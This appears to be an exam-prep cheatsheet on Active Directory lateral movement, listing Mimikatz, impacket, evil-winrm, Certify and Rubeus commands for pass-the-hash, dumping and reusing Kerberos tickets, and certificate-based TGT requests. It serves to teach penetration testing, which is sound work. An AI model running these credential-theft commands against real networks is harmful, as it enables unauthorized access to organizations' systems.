Pass the Ticket & Pass the Certificate
Active Directory
Overview
Lateral movement using Kerberos tickets and certificates.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
Pass the Hash
# Windows mimikatz: sekurlsa::pth /user:admin /domain:corp /ntlm:HASH # PTH with Mimikatz # Linux impacket-psexec -hashes :HASH user@target # PTH with PsExec evil-winrm -i target -u user -H HASH # PTH with Evil-WinRM
Pass the Ticket
# Export ticket mimikatz: sekurlsa::tickets /export # Dump tickets from memory # Use ticket export KRB5CCNAME=ticket.ccache # Set ticket env var impacket-psexec -k -no-pass user@target # Auth using Kerberos ticket
Pass the Certificate
# Request cert with Certify Certify.exe request /ca:CA-SERVER /template:User # Request certificate # Convert to PFX openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx # Convert PEM to PFX # Use with Rubeus Rubeus.exe asktgt /user:admin /certificate:cert.pfx /ptt # Request TGT using cert and Pass-the-Ticket
Command Examples
Common Pitfalls
- Tickets expire - check validity
- Need correct SPN for service access
- Clock skew can break Kerberos
Exam Survival Tips
- Use impacket with -k for ticket auth
- Check for AD CS misconfigurations
- Export tickets before session ends